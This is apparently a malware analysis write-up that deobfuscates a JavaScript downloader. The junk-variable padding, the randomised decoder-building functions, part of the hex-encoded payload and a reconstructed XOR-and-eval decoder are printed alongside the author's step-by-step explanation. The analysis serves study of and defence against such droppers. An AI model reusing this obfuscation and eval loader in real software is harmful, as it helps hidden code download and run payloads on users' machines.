var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var oouguoehg = '53039535';
var ioahfioaehfieaihoihg = '35723075092309573095';
var oahfioaeofh = '5203750923777920370723075070723957902739075903';
var ywprdfufyd = '9023384131';
var yzdombebfd = '1770605246';
var yzdombebfd = '1770605246';
var pjmboiknkr = '0352554129';
var pmiyxmujsa = '2707877134';
var pmiyxmujsa = '2707877134';
var opwwghefzj = '5254160279';
var vdoinfjmur = '8538564873';
var mrlsyqzuyg = '9667716883';
var ltzpgmjqgp = '2114029898';
var lwnnpptlnx = '4551340012';
var lwnnpptlnx = '4551340012';
var chwhrxyykl = '3143291615';
var ckkfaaatsm = '5698512820';
var tutschgyxa = '4270463703';
var tutschgyxa = '4270463703';
var txhpldqtej = '6807774618';
var sadmcgapms = '9354078833';
var sadmcgapms = '9354078833';
var kkezwogbig = '8935926736';
var jnawnjqxqg = '0382240741';
var jnawnjqxqg = '0382240741';
var bykrhqobnu = '9974898544';
var zovyjxnfga = '2558373659';
var zovyjxnfga = '2558373659';
var yrjwraxaob = '5105795564';
var qbsiuidflx = '4587525467';
var phudlgpwag = '8669250597';
var phudlgpwag = '8669250597';
var gsdqnovixu = '7242009490';
var xfaiyzlqjr = '8379071387';
var xiofhuvmqs = '1726382202';
var xiofhuvmqs = '1726382202';
var wlccqxehya = '3473605417';
var ovlpsfcmvp = '2865534310';
var nyhmbamhcp = '4402857225';
var ejjzdqsuzl = '3193796128';
var mmfwmlcphm = '5549019143';
var mmfwmlcphm = '5549019143';
var lotuupmlov = '8066330258';
var lotuupmlov = '8066330258';
var dzcpxwkptj = '7657281133';
var ccqmfrulak = '9004592148';
var ccqmfrulak = '9004592148';
var umzzizaxxg = '8686423041';
var tpnwqcjtfg = '0133744966';
var tpnwqcjtfg = '0133744966';
var tsbtzytomp = '2788067171';
var kxydsiboqe = '3817029989';
var aojtmpbskj = '7372513991';
var aojtmpbskj = '7372513991';
var sysfowhehx = '6964343894';
var rbgdxarapy = '8409755809';
var rbgdxarapy = '8409755809';
var przkqgivae = '2185240834';
var przkqgivae = '2185240834';
var hcjftnohxs = '1777899717';
var gfxubjydns = '3124102622';
var gfxubjydns = '3124102622';
var ypgpeqehjo = '2705031525';
var ypgpeqehjo = '2705031525';
var xsummtgdrp = '4250352740';
var xvijvpqzyy = '6687675755';
var xvijvpqzyy = '6687675755';
var ogrwxewlvm = '5289514538';
var oifugaggdn = '8916837553';
var oifugaggdn = '8916837553';
var ftooihllaj = '7508786446';
var fwcerlvghj = '9045009661';
var fwcerlvghj = '9045009661';
var eyqbagxcxs = '1490310576';
var uzkdwudsfe = '4567534483';
var tcgaexnnnm = '6294847498';
var lnhnhelsja = '5896796391';
var lnhnhelsja = '5896796391';
var kqdkpiunrb = '7221019216';
var canfspaawx = '6805848109';
var canfspaawx = '6805848109';
var bdbdalkvdy = '8350261324';
var bgparourlh = '1707573239';
var bgparourlh = '1707573239';
var sqynlwaviv = '0499323112';
var sqynlwaviv = '0499323112';
var stmkcrcrpv = '2836744137';
var jevxwyidmr = '1427395030';
var jevxwyidmr = '1427395030';
var jhjuncszts = '3174616145';
var ijxrwxcubb = '5599020150';
var ijxrwxcubb = '5599020150';
var zugmyfhzgp = '4101858055';
var hxujhirunq = '6638172970';
var yidwjpphkm = '5230020853';
var ykrtstzcrm = '8667344068';
var xnnraojyzv = '0114655972';
var foitwchgqh = '2479069808';
var frwiffrbxp = '5906380813';
var frwiffrbxp = '5906380813';
var mkqkbtwjgb = '7072514729';
var mmehkxyfnk = '9619837644';
var lxnumeersy = '8000786539';
var lxnumeersy = '8000786539';
var labsvzonzz = '1757089754';
var ckkmxhurwv = '0339838437';
var ckkmxhurwv = '0339838437';
var cnykgkenev = '2786241542';
var sdjrzqvqqt = '5340534575';
var jucybxvujy = '9026090407';
var ahaqmiduon = '0062162495';
var rsjdgpjgkj = '9644000190';
var quxbxksbsk = '1191324305';
var quxbxksbsk = '1191324305';
var yxlygocxat = '4548645220';
var piulivibeh = '3120396103';
var piulivibeh = '3120396103';
var pliirrsxmh = '5657887338';
var gvrdtyqjjd = '4259536911';
var gvrdtyqjjd = '4259536911';
var gyfacbafqe = '6884859126';
var fbtxkfkbyn = '8331170141';
var fbtxkfkbyn = '8331170141';
var xmcknmqfub = '7922021044';
var xmcknmqfub = '7922021044';
var woqhviaacc = '9469332159';
var ozzuypynzy = '8051283832';
var ozzuypynzy = '8051283832';
var ncnrgshioy = '1408504047';
var nejpporewh = '3945807161';
var eplkrvxqtv = '2537756864';
var dshzazhmaw = '4182069079';
2) Simplification : removing the useless parts :

The real important parts :

Seeing the name of the vars, and if they are used in the main parts, I could obtain the code that are really used :

function nikas() => function that randomly returns of of the 8 strings, parts of the future real decoder
{
var gnnrz=new Array("xxx","}$%","g.f","h){","e(p","++;","].su","}){");
return gnnrz[Math.floor(Math['rand'+new Array('om')[0]]()*gnnrz.length)];
}

function mzxbv()
{
var znhhx=
"f2650cd343bff58c7655e7e42ee45ff4459b2e58d4916daa51a7c53cca42de072c6e57f6742f5657e2070a6b44aff59f705bc8163bfc44f7c5acd31ec0843f5b44a4d5af641ac9316c4955e0157ecf5af065ace454d6c57a2255f455dfea1fe734dab642dae44d0b4fd654ded540a8057e9b44a6e16b1f4eef55bae15ac0a7ec5542ad042cc846fef16bf70bafc16e4c58f3b53a5b41ac516f4977a6755dc342a825feb140cbf53aa36ee9679d0a54ba75cd8053a8e55d3b42f431ee4f14e0a7bfb665ead6eb577be027ac4904e7118ee36efa77be907af637ec3f62f2062d7d66e6814aab1fda20df014ee4b5bb245afd07ee5b42eed42c9446b9918fa459d5d46de853fca58c1c1edda14bcf71eaf73f3762a8e14d501afcd16f7d43a2a44f9a5ad391ab6616a5e50e2357c205acbd45e9053e311ff520db204eeac5bdf25afe77efe942e7a42dc646ccd18ea145e6653aa758fa252c3e1edee1fece0ddb65fa5350d0f16c091ec9d4ef085ba635abc57eb6542b6142bdc46d1118f9a45dd442a5c57ee742c2b43d6845e0d16ac30bae10be9116e4004dc806fdb06dca1fe4b16fd24daaa44ec853ae842ade43ad444f7e58a4d16eca55dcf57b7b5ab075ae9454ca357ec155eed5daa51ead84eeb55bd415ad887ebc142dc042e4546a2118a1164e2a53a4945d3446eb759e4f58c8a45c3753"+
...
"a8a53bb244abb44df059aa344c131fc5c4da7e45cbe57d3b40d5353b8d62ca959a4862f6353ed35ba4846f5d1efb952f5b57cfe42d3857c021aaa516d6a50d4943f4c58b1155adb42d915fbef59b0258f1a16f161ea9b46f3f57be242a435ea6e1aee916e5953f0244e5344d3359e5b44d2f1fc7f16d934dfa85ff8850b6c16f361ee1a17a0c53b8144e1244e8959f2144eda1fc034ded942daa44e9b4fd054dccb40cbc57d0544a6616a5341fbb45f095eb4416e3b0bfc516e3258f9c53c2741f2b16a3e77bda55eb542c185fd1040cb753fa96ef6279dd354e955cd0853dc655ca142d211eab114f2b61ac765d9b55f2944e125faba46d6742eb118e5365e6f5ea1e53f2b5aab55ae6614c471fd620dbe841df345dd75efcc18fcc64f9f43cb058f0e1ea1346c9957dc942e675ea141fdd10dc9d4ba4755a0257d5a42d6b55fd55eb6116f671eb8753c1544c7c44b9e59f9044f3f1fca516b724dca84bc8d4bea64bb261fd9c0dbd54bb9d4be6e1ffca0d";

=> a lot of long string parts added, I only show here some parts
var zfgrg;

while(true){
try
{
zfgrg=bgnek(znhhx);
break;
}
catch(er)
{
var a = 1;
}
}
return zfgrg;
}

function bgnek(tmbxb)
{
return (new Function("tjpwq","tefnq","mnigw","var haina=tjpwq.ma"+"tch(/\\S{5}/g),okpbu=\"\",tcgcu=0;while(tcgcu<haina.lengt"+nikas()+"okpbu+=Strin"+nikas()+"romCh"+"arCod"+nikas()+"arseI"+"nt(haina[tcgcu"+nikas()+"bstr(3,"+"2),1"+"6)^54);tcgcu"+nikas()+"}eval(okpbu);")(tmbxb,null,null));
}

mzxbv();
3) Explanation of the real time part that try to built the working decoder :

The first part run is mzxbv() :

=> the main function that build the whole encoded string (used once decoded to download and save the payload) : znhhx,
=> then uses a while loop to try to decode this string, calling the function bgnek(znhhx).​

bgnek function : in more clear :

function bgnek(tmbxb)
{
return (

=> will return to the calling part the returned result from the "future" new built function

=> zfgrg=bgnek(znhhx);

=> remember this var => important with my modifications : will contain the string in clear and not the undefined value (that is the value with the real script, because content is no used)
new Function(
"tjpwq",
"tefnq",
"mnigw",
=> parameters, only the first is used : the obfuscated string in tmbxb
"var haina=tjpwq.ma"+"tch(/\\S{5}/g),okpbu=\"\",tcgcu=0;while(tcgcu<haina.lengt"+nikas()+"okpbu+=Strin"+nikas()+"romCh"+"arCod"+nikas()+"arseI"+"nt(haina[tcgcu"+nikas()+"bstr(3,"+"2),1"+"6)^54);tcgcu"+nikas()+"}eval(okpbu);"

=> the string that represents the code to be build for the anonymous function
)
(
tmbxb,
null,
null

=> parameters transmitted to the new function

tmbxb, => tjpwq
null, => tefnq
null => mnigw
)
);
}
}

The built anonymous function will looks like to :

anonymous function (tmbxb){
var haina=tjpwq.ma"+"tch(/\S{5}/g),
okpbu="",
tcgcu=0;
while(tcgcu<haina.lengt"+nikas()+"okpbu+=Strin"+nikas()+"romCh"+"arCod"+nikas()+"arseI"+"nt(haina[tcgcu"+nikas()+"bstr(3,"+"2),1"+"6)^54);
tcgcu"+nikas()+"}
eval(okpbu);"
}

But each part in red : the call of their random function that will be used to build the string of the anonymous function

=> 4 calls of nikas() function

The eval (okpbu) will eval / run the real code hidden on the precedent obfuscated string tmbxb (received as parameter - to download, save, and run the payload) that is decoded in okpbu string

Let's see the strings available on the array :

function nikas() => function that randomly returns one of the 8 strings, parts of the future real decoder, but only 5 parts in the good order will made a working decoder (if not : the catch function intercept the error, and the while loop in the previous mzxbv function continues

function nikas()
{
var gnnrz=new Array("xxx","}$%","g.f","h){","e(p","++;","].su","}){");
return gnnrz[Math.floor(Math['rand'+new Array('om')[0]]()*gnnrz.length)];

=> gnnrz[random_index_working_for_the_array];

=> 'rand' + new Array('om')[0] => "rand' + 'om" => "random" string
=> Math['"random"]() => call the Math.random method (=function)

=> returns a floating-point, pseudo-random number in the range [0, 1) that is, from 0 (inclusive) up to but not including 1 (exclusive), which you can then scale to your desired range
=> the result is multiplied by gnnrz.length : the size of the array

=> Math.floor : returns the largest integer less than or equal to a given number

=> here, the length of the file is 8, then the index is from 0 to 7 :

Demonstration :

0 <= random_number < 1

Then :

0* 8 <= random_number * 8 < 8
And then :

0 <= random_number * 8 < 8
=> with the the Math.floor : index is always from 0 to 7​
}

"xxx"
"}$%"
"g.f"
"h){"
"e(p"
"++;"
"].su"
"}){"

We must get the right string in the right place, so let's find the good piece of the puzzle that have to be return by the nikas() calls :

var haina=tjpwq.ma"+"tch(/\\S{5}/g),
okpbu="",
tcgcu=0;
while(tcgcu<haina.lengt"+nikas()+"okpbu+=Strin"+nikas()+"romCh"+"arCod"+nikas()+"arseI"+"nt(haina[tcgcu"+nikas()+"bstr(3,"+"2),1"+"6)^54);
tcgcu"+nikas()+ "}eval(okpbu);"
haina.lengt+nikas() => haina.length needed => 4th string : "h){"

var haina=tjpwq.ma"+"tch(/\\S{5}/g),
okpbu="",
tcgcu=0;
while(tcgcu<haina.lengt" + "h){" +"okpbu+=Strin"+nikas()+"romCh"+"arCod"+nikas()+"arseI"+"nt(haina[tcgcu"+nikas()+"bstr(3,"+"2),1"+"6)^54);
tcgcu"+nikas()+ "}eval(okpbu);"
"okpbu+=Strin"+nikas()+"romCh" => String.fromCharCode needed => 3rd string : "g.f"

var haina=tjpwq.ma"+"tch(/\\S{5}/g),
okpbu="",
tcgcu=0;
while(tcgcu<haina.lengt" + "h){" + "okpbu +=Strin" + "g.f" + "romCh"+"arCod"+nikas()+"arseI"+"nt(haina[tcgcu"+nikas()+"bstr(3,"+"2),1"+"6)^54);
tcgcu"+nikas()+ "}eval(okpbu);"
"fromcharCod"+nikas()+"arseI"+"nt => ParsInt needed (to get a int from a string)

=> 5th string : "e(p"

=> with the good e needed for the end of "FromCharCod" !
var haina=tjpwq.ma"+"tch(/\\S{5}/g),
okpbu="",
tcgcu=0;
while(tcgcu<haina.lengt" + "h){" + "okpbu +=Strin" + "g.f" + "romCh" + "arCod" + "e(p" +"arseI"+"nt(haina[tcgcu"+nikas()+"bstr(3,"+"2),1"+"6)^54);
tcgcu"+nikas()+ "}eval(okpbu);"
haina[tcgcu"+nikas()+"bstr(" => substr function needed (to retrieve a part of a string) :

=> 7th string in the array : "].su"

=> it also closes the the brake for the index part : haina[tcgcu] : tcgcu : index on haina array​

var haina=tjpwq.ma"+"tch(/\\S{5}/g),
okpbu="",
tcgcu=0;
while(tcgcu<haina.lengt" + "h){" + "okpbu +=Strin" + "g.f" + "romCh" + "arCod" + "e(p" +"arseI"+"nt(haina[tcgcu"+ "].su" +"bstr(3,"+"2),1"+"6)^54);
tcgcu"+nikas()+"}eval(okpbu);"
tcgcu"+nikas() => There a several string available, but its easy to find the last part :

=> tcgcu is the index for the loop, then we must find an incremental code at then end of the while loop : tcgcu = tcgcu+1,for example, that can be write tcgcu++ => "++;" is our last part needed​

"var haina=tjpwq.ma"+"tch(/\\S{5}/g),
okpbu="",
tcgcu=0;
while(tcgcu<haina.lengt" + "h){" + "okpbu +=Strin" + "g.f" + "romCh" + "arCod" + "e(p" +"arseI"+"nt(haina[tcgcu"+ "].su" +"bstr(3,"+"2),1"+"6)^54);
tcgcu"+ "++;" + "}eval(okpbu);"
Conclusion :

"xxx" , "}$%" and "}){" are not used

and our working function is - simplified (once the string is build and function is returned) :

anonymous function (tjpwq){
var haina=tjpwq.match(/\S{5}/g),
okpbu="",
tcgcu=0;
while(tcgcu<haina.lengh){
okpbu +=String.fromCharCode(parseInt(haina[tcgcu].substr(3,2),16)^54);
tcgcu++;
}eval(okpbu);
}

4) Explanation of the decoder function :

var haina=tjpwq.match(/\S{5}/g),

=> /\S{5}/g : regular expression : to find all parts of 5 chars :

=> \\S => \S because it is converted from a string to 'codes on a function'
=> haina : array of strings with each 5 chars

=> the obfuscated / encoded string that contains the real downloader part are here , divided in several string of 5 chars

Exemple :

"f2650cd343bff58c7655e7e42ee45ff4459b2e58d4916............

=> array : "f2650" , "cd343" ,"bff58" , "c7655" , "e7e42" , "ee45f", "f4459", "b2e58", "d4916" .........​
okpbu="",

